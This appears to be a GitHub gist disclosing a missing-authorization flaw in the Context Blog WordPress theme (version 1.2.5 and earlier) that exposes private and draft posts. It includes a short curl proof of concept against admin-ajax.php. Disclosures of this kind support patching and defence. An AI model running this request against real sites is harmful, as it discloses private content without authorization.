jasoncarle/context-blog-theme-1.2.5-unauth-access-vuln.MD.md

Last active February 18, 2026 03:26

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/jasoncarle/595001a6a0c6864f45ddfb1154426b61.js"></script>
Save jasoncarle/595001a6a0c6864f45ddfb1154426b61 to your computer and use it in GitHub Desktop.

Download ZIP

Context Blog Theme <= 1.2.5 Vulnerability

Raw

context-blog-theme-1.2.5-unauth-access-vuln.MD.md

Context Blog Theme <= v1.2.5 Unauthorized Access Vulnerability

Wordpress Theme Repository URL: https://wordpress.org/themes/context-blog/

Plugin Homepage: https://www.postmagthemes.com/downloads/context-blog-free-wordpress-theme/

Plugin Author: postmagthemes https://wordpress.org/themes/author/postmagthemes/

Discovered by: Jason Carle hello@jasoncarle.com

Date: 16/09/2025

VULNERABILITY

Unauthorized Access

The Context Blog WordPress theme contains a missing authorization vulnerability in the AJAX handler 'context_blog_modal_popup' (inc/ajax/modal-popup.php).

The vulnerability allows unauthenticated remote attackers to retrieve the content of any post (or page or any post type) by sending a POST request to wp-admin/admin-ajax.php with the action parameter set to 'context_blog_modal_popup' and a postID parameter. This can lead to unauthorized disclosure of potentially sensitive, draft or private post content.

Any attacker can send a POST request to /wp-admin/admin-ajax.php with:

{
    action: 'context_blog_modal_popup',
    postID: [any_post_id]
}

Proof of concept

curl -X POST https://%DOMAIN%/wp-admin/admin-ajax.php 
 -H "Content-Type: application/x-www-form-urlencoded" 
 -d "action=context_blog_modal_popup&postID=1" -v

Result:

POST using RapidAPI:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment